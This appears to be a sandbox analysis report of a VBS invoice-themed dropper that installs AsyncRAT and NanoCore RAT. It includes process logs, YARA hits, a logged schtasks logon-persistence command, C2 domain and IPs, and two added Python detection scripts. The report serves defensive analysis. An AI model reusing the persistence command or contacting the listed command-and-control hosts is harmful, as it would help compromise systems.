Source: 4.2.fi.exe.40000.0.unpack, u0023u003dqjryTBW16mUfo_ItH9KWoGQu003du003d.cs Reference to suspicious API methods: ('#=qxG$Aklpbf6gyBfAqTMmORA==', 'OpenProcess@kernel32.dll'), ('#=qh7diH14jww3Fm9rMJ_jIfQ==', 'FindResourceEx@kernel32.dll')
Source: 7.2.dhcpmon.exe.c40000.0.unpack, u0023u003dqjryTBW16mUfo_ItH9KWoGQu003du003d.cs Reference to suspicious API methods: ('#=qxG$Aklpbf6gyBfAqTMmORA==', 'OpenProcess@kernel32.dll'), ('#=qh7diH14jww3Fm9rMJ_jIfQ==', 'FindResourceEx@kernel32.dll')
Source: 7.0.dhcpmon.exe.c40000.0.unpack, u0023u003dqjryTBW16mUfo_ItH9KWoGQu003du003d.cs Reference to suspicious API methods: ('#=qxG$Aklpbf6gyBfAqTMmORA==', 'OpenProcess@kernel32.dll'), ('#=qh7diH14jww3Fm9rMJ_jIfQ==', 'FindResourceEx@kernel32.dll')
Source: 26.0.Notepads.exe.ee0000.0.unpack, Client/Handle_Packet/HandleLimeLogger.cs Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll')
Source: 26.2.Notepads.exe.ee0000.0.unpack, Client/Handle_Packet/HandleLimeLogger.cs Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll')
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\ame.exe 'C:\Users\user\AppData\Local\Temp\ame.exe'
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\fi.exe 'C:\Users\user\AppData\Local\Temp\fi.exe'
Source: C:\Users\user\AppData\Local\Temp\ame.exe Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\tmp4DD8.tmp.vbs'
Source: C:\Users\user\AppData\Local\Temp\ame.exe Process created: C:\Users\user\AppData\Roaming\Notepads.exe 'C:\Users\user\AppData\Roaming\Notepads.exe'
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc onlogon /rl highest /tn Notepads.exe /tr 'C:\Users\user\AppData\Roaming\Notepads.exe
Source: fi.exe, 00000004.00000003.454678808.00000000008D7000.00000004.00000001.sdmp Binary or memory string: Program Manager
Source: fi.exe, 00000004.00000002.595277420.0000000000D90000.00000002.00000001.sdmp, Notepads.exe, 0000001A.00000002.594919151.0000000001D20000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: fi.exe, 00000004.00000002.595277420.0000000000D90000.00000002.00000001.sdmp, Notepads.exe, 0000001A.00000002.594919151.0000000001D20000.00000002.00000001.sdmp Binary or memory string: Progman
Source: fi.exe, 00000004.00000003.570431620.00000000008C1000.00000004.00000001.sdmp Binary or memory string: Program Manager*
Source: fi.exe, 00000004.00000002.595277420.0000000000D90000.00000002.00000001.sdmp, Notepads.exe, 0000001A.00000002.594919151.0000000001D20000.00000002.00000001.sdmp Binary or memory string: &Program Manager
Source: fi.exe, 00000004.00000002.595277420.0000000000D90000.00000002.00000001.sdmp, Notepads.exe, 0000001A.00000002.594919151.0000000001D20000.00000002.00000001.sdmp Binary or memory string: Progmanlock
Source: fi.exe, 00000004.00000003.366597291.00000000008D7000.00000004.00000001.sdmp Binary or memory string: Program Manager|
Source: fi.exe, 00000004.00000003.559369359.000000000087F000.00000004.00000001.sdmp Binary or memory string: =rProgram Manager
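The process-creation chain above (wscript.exe dropping and launching ame.exe and fi.exe from %TEMP%, ame.exe launching Notepads.exe from %APPDATA% and a second wscript.exe on a temporary .vbs, and that wscript.exe registering an onlogon scheduled task with /rl highest) is the part of this report a SOC analyst would most want to turn into detection logic. The following is an added example, not sandbox output and not part of the original report: the events are constructed by hand from the command lines listed above (plus two benign control events), the event schema is a minimal stand-in for a Sysmon/EDR process-creation record, and the rule names and the list of user-writable directories are the example's own assumptions.

```python
"""Added example: hunting rules for the WScript dropper chain shown in this report.

The ProcEvent records below are constructed from the report's own command lines;
they are not real telemetry. Directory markers and rule names are assumptions.
"""
import re
from dataclasses import dataclass

# Directories an unprivileged user can write to; a PE that lives or is persisted
# here is far more suspicious than one under System32 or Program Files.
USER_WRITABLE = ("\\appdata\\local\\temp\\", "\\appdata\\roaming\\",
                 "\\users\\public\\", "\\programdata\\")
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}


@dataclass
class ProcEvent:
    parent_image: str   # full path of the creating process
    image: str          # full path of the created process
    command_line: str   # command line of the created process


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def in_user_writable(path: str) -> bool:
    low = path.lower()
    return any(marker in low for marker in USER_WRITABLE)


def schtasks_option(cmd: str, name: str):
    """Value of a schtasks /<name> option, or None.

    Tolerates the single-quote rendering used in the report and a missing
    closing quote (the /tr value above is cut off after the path).
    """
    pattern = r"/" + name + r"\s+['\"]?(.+?)['\"]?\s*(?=/[a-z]+\b|$)"
    m = re.search(pattern, cmd, re.I)
    return m.group(1).strip() if m else None


def rule_script_host_drops_pe(ev: ProcEvent):
    if (basename(ev.parent_image) in SCRIPT_HOSTS
            and ev.image.lower().endswith(".exe") and in_user_writable(ev.image)):
        return "script host launched a PE from a user-writable directory"


def rule_logon_task_from_user_dir(ev: ProcEvent):
    if basename(ev.image) != "schtasks.exe" or "/create" not in ev.command_line.lower():
        return None
    sc = (schtasks_option(ev.command_line, "sc") or "").lower()
    rl = (schtasks_option(ev.command_line, "rl") or "").lower()
    tr = schtasks_option(ev.command_line, "tr") or ""
    if sc in {"onlogon", "onstart"} and in_user_writable(tr):
        extra = " with highest privileges" if rl == "highest" else ""
        return f"logon task runs {tr!r} from a user-writable directory{extra}"


def rule_user_dir_pe_spawns_script_host(ev: ProcEvent):
    if (in_user_writable(ev.parent_image) and basename(ev.image) in SCRIPT_HOSTS
            and ".vbs" in ev.command_line.lower() and in_user_writable(ev.command_line)):
        return "PE in a user-writable directory launched a VBS via a script host"


def rule_user_dir_pe_spawns_user_dir_pe(ev: ProcEvent):
    if (in_user_writable(ev.parent_image) and in_user_writable(ev.image)
            and ev.image.lower().endswith(".exe")):
        return "PE in a user-writable directory launched another PE from a user-writable directory"


RULES = (rule_script_host_drops_pe, rule_logon_task_from_user_dir,
         rule_user_dir_pe_spawns_script_host, rule_user_dir_pe_spawns_user_dir_pe)


def triage(events):
    """Return (event index, rule name, reason) for every rule that fires."""
    findings = []
    for idx, ev in enumerate(events):
        for rule in RULES:
            reason = rule(ev)
            if reason:
                findings.append((idx, rule.__name__, reason))
    return findings


# Constructed from the "Process created" lines of this report (events 0-4) plus
# two benign control events (5-6) that must not fire.
EVENTS = [
    ProcEvent(r"C:\Windows\System32\wscript.exe", r"C:\Users\user\AppData\Local\Temp\ame.exe",
              r"'C:\Users\user\AppData\Local\Temp\ame.exe'"),
    ProcEvent(r"C:\Windows\System32\wscript.exe", r"C:\Users\user\AppData\Local\Temp\fi.exe",
              r"'C:\Users\user\AppData\Local\Temp\fi.exe'"),
    ProcEvent(r"C:\Users\user\AppData\Local\Temp\ame.exe", r"C:\Windows\System32\wscript.exe",
              r"'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\tmp4DD8.tmp.vbs'"),
    ProcEvent(r"C:\Users\user\AppData\Local\Temp\ame.exe", r"C:\Users\user\AppData\Roaming\Notepads.exe",
              r"'C:\Users\user\AppData\Roaming\Notepads.exe'"),
    ProcEvent(r"C:\Windows\System32\wscript.exe", r"C:\Windows\System32\schtasks.exe",
              r"'C:\Windows\System32\schtasks.exe' /create /sc onlogon /rl highest /tn Notepads.exe "
              r"/tr 'C:\Users\user\AppData\Roaming\Notepads.exe"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe", r"notepad.exe"),
    ProcEvent(r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\schtasks.exe",
              r"schtasks.exe /create /sc daily /tn Backup /tr 'C:\Program Files\Backup\backup.exe'"),
]

if __name__ == "__main__":
    for idx, rule, reason in triage(EVENTS):
        print(f"event {idx}: {rule}: {reason}")
```

Every one of the five report events fires exactly one rule and neither control event fires. The schtasks rule keys on the combination that matters here (onlogon trigger plus a /tr path in a user-writable directory) rather than on the task name, since "Notepads.exe" is an arbitrary choice by the operator; the dhcpmon.exe copy under Program Files (x86) that fi.exe drops would need a separate rule keyed on the directory name or on the unsigned binary.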

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\ame.exe Queries volume information: C:\Users\user\AppData\Local\Temp\ame.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Notepads.exe Queries volume information: C:\Users\user\AppData\Roaming\Notepads.exe VolumeInformation
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
Yara detected AsyncRAT
Source: Yara match File source: 00000001.00000002.336048094.0000016C170D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.325883789.0000016C16535000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.547269938.0000000012956000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.329227770.0000000000502000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000000.533439085.0000000000EE2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.592748395.0000000000EE2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.575722228.0000000000F42000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.325568596.0000016C16534000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000000.540116031.0000000000F42000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.533753846.0000000000502000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ame.exe PID: 6592, type: MEMORY
Source: Yara match File source: Process Memory Space: Notepads.exe PID: 5444, type: MEMORY
Source: Yara match File source: Process Memory Space: wscript.exe PID: 6428, type: MEMORY
Source: Yara match File source: Process Memory Space: Notepads.exe PID: 2152, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Roaming\Notepads.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\ame.exe, type: DROPPED
Source: Yara match File source: 3.0.ame.exe.500000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.wscript.exe.16c1711f630.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.0.Notepads.exe.ee0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.wscript.exe.16c1711f630.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.ame.exe.129567e0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.0.Notepads.exe.f40000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.2.Notepads.exe.f40000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.2.Notepads.exe.ee0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.ame.exe.500000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.wscript.exe.16c165eefd0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.ame.exe.129567e0.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.wscript.exe.16c170d0090.5.raw.unpack, type: UNPACKEDPE

Stealing of Sensitive Information:

barindex
Yara detected Nanocore RAT
Source: Yara match File source: 00000001.00000003.325858053.0000016C141F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.336048094.0000016C170D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.375251510.0000000003201000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.600839165.0000000004F70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.374117540.0000000000C42000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.326079423.0000016C173D1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.592804295.0000000000042000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.375293411.0000000004201000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.355766753.0000000000C42000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.330048475.0000000000042000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.599666904.000000000381A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: fi.exe PID: 6616, type: MEMORY
Source: Yara match File source: Process Memory Space: wscript.exe PID: 6428, type: MEMORY
Source: Yara match File source: Process Memory Space: dhcpmon.exe PID: 6952, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\fi.exe, type: DROPPED
Source: Yara match File source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED
Source: Yara match File source: 7.2.dhcpmon.exe.424e434.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.wscript.exe.16c170d0090.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.fi.exe.4f70000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.0.dhcpmon.exe.c40000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.fi.exe.382e434.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.fi.exe.38295fe.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.dhcpmon.exe.c40000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.fi.exe.382e434.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.dhcpmon.exe.424e434.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.dhcpmon.exe.4252a5d.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.fi.exe.3832a5d.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.dhcpmon.exe.42495fe.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.fi.exe.4f70000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.0.fi.exe.40000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.fi.exe.4f74629.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.wscript.exe.16c170d0090.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.fi.exe.40000.0.unpack, type: UNPACKEDPE

Remote Access Functionality:

barindex
Detected Nanocore Rat
Source: wscript.exe, 00000001.00000003.325858053.0000016C141F0000.00000004.00000001.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: fi.exe String found in binary or memory: NanoCore.ClientPluginHost
Source: fi.exe, 00000004.00000002.600475304.0000000004A60000.00000004.00000001.sdmp String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: dhcpmon.exe String found in binary or memory: NanoCore.ClientPluginHost
Source: dhcpmon.exe, 00000007.00000002.375251510.0000000003201000.00000004.00000001.sdmp String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: dhcpmon.exe.4.dr String found in binary or memory: NanoCore.ClientPluginHost
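The strings above are the NanoCore client plugin-host interface names (NanoCore.ClientPluginHost, IClientNetworkHost, IClientLoggingHost, and so on) as they sit in the .NET metadata #Strings heap of the unpacked client, which is why the same run of names shows up both in the dropped files and in the fi.exe and dhcpmon.exe memory dumps. A scanner that looks for them in a memory dump has to search two encodings: metadata names are stored as UTF-8/ASCII, while any copy that ends up in a managed System.String object is UTF-16LE. The following is an added example, not part of this report or of any sandbox tooling: the marker list is taken from the strings quoted above, and the two "dump" buffers are constructed inline (a fragment of the quoted metadata run padded with zero bytes, and a benign buffer) so it runs offline.

```python
"""Added example: search a memory-dump-style buffer for NanoCore plugin-host
markers in both the encodings a .NET process leaves them in.

Markers come from the strings quoted in this report; the sample buffers
below are constructed, not real dumps.
"""

# Distinct interface/assembly names from the quoted metadata run. Prefixes of
# other markers (e.g. "NanoCore.ClientPlugin") are deliberately left out so a
# single string cannot be counted twice.
MARKERS = (
    "NanoCore.ClientPluginHost",
    "IClientNetworkHost",
    "IClientUIHost",
    "IClientLoggingHost",
    "ClientPlugin.dll",
)


def needles(marker: str) -> dict:
    """The byte patterns to search for: metadata heap (ASCII) and managed string (UTF-16LE)."""
    return {"ascii": marker.encode("ascii"), "utf-16le": marker.encode("utf-16-le")}


def find_markers(buf: bytes) -> dict:
    """Map each marker found in buf to a list of (offset, encoding) hits."""
    hits = {}
    for marker in MARKERS:
        for enc_name, needle in needles(marker).items():
            start = 0
            while (pos := buf.find(needle, start)) != -1:
                hits.setdefault(marker, []).append((pos, enc_name))
                start = pos + 1
    return hits


def looks_like_nanocore(buf: bytes, min_distinct: int = 2) -> bool:
    """Require at least two distinct markers so a lone string in an unrelated
    process (e.g. an AV signature database) does not trigger on its own."""
    return len(find_markers(buf)) >= min_distinct


def scan_file(path: str) -> dict:
    """Whole-file scan; for multi-GB dumps read in chunks overlapping by
    2 * len(longest marker) bytes so a UTF-16 hit on a boundary is not lost."""
    with open(path, "rb") as fh:
        return find_markers(fh.read())


# Constructed sample: a slice of the metadata string run quoted in this report,
# zero-padded as it would be in a dump, followed by one UTF-16LE managed-string copy.
META_FRAGMENT = (
    b"IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHost"
    b"NanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHost"
)
SAMPLE_DUMP = (b"\x00" * 32 + META_FRAGMENT + b"\x00" * 16
               + "NanoCore.ClientPluginHost".encode("utf-16-le") + b"\x00" * 8)
# Constructed benign buffer: ordinary VB.NET runtime names, no NanoCore markers.
BENIGN_DUMP = b"\x00" * 16 + b"Microsoft.VisualBasic.ApplicationServicesApplicationBase" + b"\x00" * 16

if __name__ == "__main__":
    for marker, found in find_markers(SAMPLE_DUMP).items():
        print(marker, found)
    print("sample:", looks_like_nanocore(SAMPLE_DUMP), "benign:", looks_like_nanocore(BENIGN_DUMP))
```

On the constructed sample the scanner reports NanoCore.ClientPluginHost twice, once as ASCII inside the metadata run and once as UTF-16LE, and three further interface names; the benign buffer yields nothing. The UTF-16 search is what catches the marker after the client has been loaded and its strings materialised, which is the state a post-mortem process dump is usually in.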
Yara detected Nanocore RAT
Source: Yara match File source: 00000001.00000003.325858053.0000016C141F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.336048094.0000016C170D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.375251510.0000000003201000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.600839165.0000000004F70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.374117540.0000000000C42000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.326079423.0000016C173D1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.592804295.0000000000042000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.375293411.0000000004201000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.355766753.0000000000C42000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.330048475.0000000000042000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.599666904.000000000381A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: fi.exe PID: 6616, type: MEMORY
Source: Yara match File source: Process Memory Space: wscript.exe PID: 6428, type: MEMORY
Source: Yara match File source: Process Memory Space: dhcpmon.exe PID: 6952, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\fi.exe, type: DROPPED
Source: Yara match File source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED
Source: Yara match File source: 7.2.dhcpmon.exe.424e434.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.wscript.exe.16c170d0090.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.fi.exe.4f70000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.0.dhcpmon.exe.c40000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.fi.exe.382e434.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.fi.exe.38295fe.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.dhcpmon.exe.c40000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.fi.exe.382e434.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.dhcpmon.exe.424e434.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.dhcpmon.exe.4252a5d.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.fi.exe.3832a5d.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.dhcpmon.exe.42495fe.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.fi.exe.4f70000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.0.fi.exe.40000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.fi.exe.4f74629.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.wscript.exe.16c170d0090.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.fi.exe.40000.0.unpack, type: UNPACKEDPE
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\AppData\Local\Temp\fi.exe Code function: 4_2_023428EA bind, 4_2_023428EA
Source: C:\Users\user\AppData\Local\Temp\fi.exe Code function: 4_2_023428A9 bind, 4_2_023428A9
Behavior Graph ID: 404165  Sample: Invoice No F1019855_PDF.vbs  Startdate: 04/05/2021  Architecture: WINDOWS  Score: 100

Top-level signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus detection for dropped file; 15 other signatures
Top-level DNS/IP: sys2021.linkpc.net

Process tree (indentation = parent/child; bracketed numbers are the per-process counters shown on the graph nodes):

wscript.exe [3]
    dropped: C:\Users\user\AppData\Local\Temp\fi.exe, PE32
    dropped: C:\Users\user\AppData\Local\Temp\ame.exe, PE32
    signatures: Benign windows process drops PE files; VBScript performs obfuscated calls to suspicious functions; Uses schtasks.exe or at.exe to add and modify task schedules
    ame.exe [14 7]
        dropped: C:\Users\user\AppData\Roaming\Notepads.exe, PE32
        dropped: C:\Users\user\AppData\...\tmp4DD8.tmp.vbs, ASCII
        signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
        Notepads.exe [2]
            DNS/IP: sys2021.linkpc.net
            signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
        wscript.exe [1]
            schtasks.exe
                conhost.exe
    fi.exe [1 10]
        DNS/IP: sys2021.linkpc.net 79.137.109.121, ports 10090, 11940, 49716, OVHFR France
        DNS/IP: 191.96.25.26, ports 11940, 49725, 49726, AS40676US Chile
        DNS/IP: 192.168.2.1 unknown unknown
        dropped: C:\Program Files (x86)\...\dhcpmon.exe, PE32
        dropped: C:\Users\user\AppData\Roaming\...\run.dat, data
        signatures: Hides that the sample has been downloaded from the Internet (zone.identifier)
dhcpmon.exe [3]
    dropped: C:\Users\user\AppData\...\dhcpmon.exe.log, ASCII
Notepads.exe
    dropped: C:\Users\user\AppData\...\Notepads.exe.log, ASCII

Contacted Public IPs

IP              Domain              Country  ASN    ASN Name   Malicious
191.96.25.26    unknown             Chile    40676  AS40676US  false
79.137.109.121  sys2021.linkpc.net  France   16276  OVHFR      false

Private

IP
192.168.2.1

Contacted Domains

Name IP Active
sys2021.linkpc.net 79.137.109.121 true

Contacted URLs

Name                Malicious  Antivirus Detection    Reputation
                    true       Avira URL Cloud: safe  low
sys2021.linkpc.net  false                             high